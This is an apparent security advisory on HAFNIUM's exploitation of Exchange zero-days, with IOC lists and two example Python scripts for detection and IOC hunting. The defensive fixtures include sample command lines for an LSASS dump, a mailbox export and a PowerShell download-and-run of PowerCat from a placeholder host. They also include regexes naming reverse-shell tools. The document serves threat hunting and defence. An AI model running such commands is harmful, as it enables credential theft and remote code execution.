
HAFNIUM Attacks Exchange Servers with Zero-days

Introduction

Microsoft has detected multiple zero-day vulnerabilities being used to attack on-premises versions of Microsoft Exchange Server. Microsoft attributes the attacks to a group it calls HAFNIUM. Based on the observed tactics, techniques and procedures (TTPs), the group is assessed to be sponsored by the Chinese government and operating out of China.

HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and non-governmental organizations.

In this campaign, Microsoft also observed HAFNIUM interacting with victims' Office 365 tenants. Although these attempts usually do not succeed in compromising customer accounts, such reconnaissance helps the attacker learn more about the target environment.

Techniques

Microsoft has published the following information to help customers understand the techniques HAFNIUM used to exploit these vulnerabilities, so that unpatched systems can be defended more effectively against future attacks:

  • CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
  • CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization occurs when untrusted, user-controllable data is deserialized by a program. Exploiting it gave HAFNIUM the ability to run code as SYSTEM on the Exchange server; doing so requires administrator permissions or another vulnerability to exploit first.
  • CVE-2021-26858 is a post-authentication arbitrary file write vulnerability in Exchange. Once HAFNIUM could authenticate to the Exchange server, they could use it to write a file to any path on the server. Authentication was obtained by exploiting the CVE-2021-26855 SSRF or by compromising a legitimate administrator's credentials.
  • CVE-2021-27065 is a post-authentication arbitrary file write vulnerability in Exchange. Once HAFNIUM could authenticate to the Exchange server, they could use it to write a file to any path on the server. Authentication was obtained by exploiting the CVE-2021-26855 SSRF or by compromising a legitimate administrator's credentials.

Details

After exploiting these vulnerabilities to gain initial access, HAFNIUM deployed web shells on the compromised server. A web shell lets the attacker steal data and perform further malicious actions that lead to additional compromise. The following is an example of an ASP web shell deployed by HAFNIUM:

(Image: HAFNIUM web shell sample, not reproduced here)

After deploying a web shell, HAFNIUM performed the following post-exploitation activities:

  • Used Procdump to dump LSASS process memory.
  • Used 7-Zip to compress stolen data into a ZIP file for exfiltration.
  • Added and used the Exchange PowerShell snap-in to export mailbox data.
  • Used the Nishang Invoke-PowerShellTcpOneLine reverse shell.
  • Downloaded PowerCat from GitHub and used it to open a connection to a remote server.

HAFNIUM operators were also able to download the Exchange offline address book from compromised systems, which contains information about the organization and its users.
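To turn the post-exploitation activity above into something a SOC can hunt for, the following Python script, added here as an example and not part of the original advisory, runs a small set of command-line detection rules over process-creation records. The rule names, the sample command lines and the GitHub URL are all constructed for the example; the patterns only follow the tools and cmdlets the advisory names.

```python
import re

# Each rule maps a label to a pattern over a process command line. The patterns
# follow the post-exploitation activity described in the advisory; the labels
# are this example's own naming.
RULES = [
    ("lsass_dump_procdump",
     re.compile(r"procdump(64)?\.exe.*\blsass\b", re.I)),
    ("archive_staging_7zip",
     re.compile(r"\b7z(a|g)?\.exe\s+a\b", re.I)),
    ("exchange_snapin_mailbox_export",
     re.compile(r"Add-PSSnapin\s+Microsoft\.Exchange.*MailboxExport", re.I)),
    ("nishang_reverse_shell",
     re.compile(r"Invoke-PowerShellTcpOneLine", re.I)),
    ("powercat_download",
     re.compile(r"(github\.com.*powercat|powercat\.ps1)", re.I)),
]

# Constructed sample command lines, not taken from any real incident.
# The raw.githubusercontent.com path is a placeholder, not a real repository.
SAMPLE_EVENTS = [
    r"procdump64.exe -accepteula -ma lsass.exe C:\windows\temp\lsass.dmp",
    r"7z.exe a -tzip C:\windows\temp\export.zip C:\windows\temp\export",
    "powershell.exe Add-PSSnapin Microsoft.Exchange.Powershell.Snapin; "
    "New-MailboxExportRequest -Mailbox user -FilePath \\\\share\\user.pst",
    "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString("
    "'https://raw.githubusercontent.com/EXAMPLE-PLACEHOLDER/powercat.ps1')",
    "powershell.exe -c Invoke-PowerShellTcpOneLine",
    r"notepad.exe C:\Users\admin\notes.txt",
]


def classify(cmdline):
    """Return the labels of every rule that matches one command line."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def scan(events):
    """Return (command line, labels) for each event matching at least one rule."""
    hits = []
    for event in events:
        labels = classify(event)
        if labels:
            hits.append((event, labels))
    return hits


if __name__ == "__main__":
    for event, labels in scan(SAMPLE_EVENTS):
        print(", ".join(labels), "<-", event)
```

In production the events would come from Sysmon event ID 1 or Windows Security event 4688 command lines; the last sample line is benign and is there to show that the rules do not fire on ordinary activity.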

IOCs

IPs:
103.77.192.219
104.140.114.110
104.250.191.110
108.61.246.56
149.28.14.163
157.230.221.198
167.99.168.251
185.250.151.72
192.81.208.169
203.160.69.66
211.56.98.146
5.2.69.14
5.254.43.18
80.92.205.81
91.192.103.43


Web shell hashes (MD5):
4d3453f05a6706de277b9eebf9ac52c9
fd3f42bbdc6da346bc58a05da4bdd33c
4c72d7c7507d3b8bf2a33c60c19de1a3

Web shell hashes (SHA-1):
bc0467bbcce548031b850933b4ab1613328ef5e6
d8c5eeef54952fb1e7d5c9501d3db712e53c4d0d
920a5611d37567c5ca4a597828994c8fc166f4d4


Web shell paths:
C:\inetpub\wwwroot\aspnet_client\
C:\inetpub\wwwroot\aspnet_client\system_web\


Exchange Server installation paths:
%PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
C:\Exchange\FrontEnd\HttpProxy\owa\auth\


Web shell file names:
aspnet_client.aspx
aspnet_iisstart.aspx
aspnet_www.aspx
document.aspx
errorEE.aspx
errorEEE.aspx
errorEW.aspx
errorFF.aspx
error_page.aspx
healthcheck.aspx
help.aspx
Logout.aspx
one.aspx
OutlookEN.aspx
RedirSuiteServerProxy.aspx
shell.aspx
supp0rt.aspx
web.aspx
xx.aspx


Paths for LSASS dumps:
C:\windows\temp\
C:\root\
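The following Python script, added here as an example and not part of the original advisory, applies the IOCs above the way a defender would: it walks a web root looking for the listed file names and file hashes, and checks web server log lines for the listed IP addresses. The directory layout it builds, the log lines and the 198.51.100.7 documentation address are constructed so the script runs offline; a real hunt would point scan_tree() at the aspnet_client and owa\auth directories listed above and find_ioc_ips() at the IIS logs.

```python
import hashlib
import os
import re
import tempfile

# IOC values copied from the advisory above.
IOC_IPS = {
    "103.77.192.219", "104.140.114.110", "104.250.191.110", "108.61.246.56",
    "149.28.14.163", "157.230.221.198", "167.99.168.251", "185.250.151.72",
    "192.81.208.169", "203.160.69.66", "211.56.98.146", "5.2.69.14",
    "5.254.43.18", "80.92.205.81", "91.192.103.43",
}
IOC_MD5 = {
    "4d3453f05a6706de277b9eebf9ac52c9",
    "fd3f42bbdc6da346bc58a05da4bdd33c",
    "4c72d7c7507d3b8bf2a33c60c19de1a3",
}
IOC_SHA1 = {
    "bc0467bbcce548031b850933b4ab1613328ef5e6",
    "d8c5eeef54952fb1e7d5c9501d3db712e53c4d0d",
    "920a5611d37567c5ca4a597828994c8fc166f4d4",
}
# Lower-cased because NTFS file names are case-insensitive.
IOC_FILENAMES = {name.lower() for name in [
    "aspnet_client.aspx", "aspnet_iisstart.aspx", "aspnet_www.aspx",
    "document.aspx", "errorEE.aspx", "errorEEE.aspx", "errorEW.aspx",
    "errorFF.aspx", "error_page.aspx", "healthcheck.aspx", "help.aspx",
    "Logout.aspx", "one.aspx", "OutlookEN.aspx", "RedirSuiteServerProxy.aspx",
    "shell.aspx", "supp0rt.aspx", "web.aspx", "xx.aspx",
]}

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def hash_file(path):
    """Return (md5, sha1) hex digests of a file, read in chunks."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            md5.update(chunk)
            sha1.update(chunk)
    return md5.hexdigest(), sha1.hexdigest()


def scan_tree(root):
    """Walk a web root and flag files whose name or hash is on the IOC lists."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if name.lower() in IOC_FILENAMES:
                reasons.append("ioc_filename")
            md5, sha1 = hash_file(path)
            if md5 in IOC_MD5:
                reasons.append("ioc_md5")
            if sha1 in IOC_SHA1:
                reasons.append("ioc_sha1")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)


def find_ioc_ips(log_lines):
    """Return (ip, line) for every log line that contains a listed IP."""
    hits = []
    for line in log_lines:
        for ip in IPV4.findall(line):
            if ip in IOC_IPS:
                hits.append((ip, line))
    return hits


def build_demo_tree():
    """Constructed stand-in for C:\\inetpub\\wwwroot so the example runs offline."""
    root = tempfile.mkdtemp(prefix="ioc_demo_")
    sys_web = os.path.join(root, "aspnet_client", "system_web")
    os.makedirs(sys_web)
    with open(os.path.join(root, "aspnet_client", "healthcheck.aspx"), "w") as fh:
        fh.write("<%-- constructed placeholder file, not a web shell --%>\n")
    with open(os.path.join(sys_web, "web.config"), "w") as fh:
        fh.write("<configuration />\n")
    return root


# Constructed IIS-style log lines; 198.51.100.7 is a documentation address.
SAMPLE_LOG = [
    "2021-03-02 10:15:02 10.0.0.5 POST /owa/auth/healthcheck.aspx - 443 - 103.77.192.219 - 200",
    "2021-03-02 10:16:40 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 198.51.100.7 - 200",
]


def run_demo():
    """Scan the constructed tree and log lines; returns both sets of hits."""
    root = build_demo_tree()
    return {"files": scan_tree(root), "ips": find_ioc_ips(SAMPLE_LOG)}


if __name__ == "__main__":
    for kind, hits in run_demo().items():
        print(kind, hits)
```

The placeholder file is flagged by name only, since its content does not hash to any listed value; on a real server a hit on both name and hash is the strongest signal, while a name-only hit still warrants reviewing the file's contents and creation time, because the attacker can trivially change a web shell's bytes but tends to reuse the same drop locations.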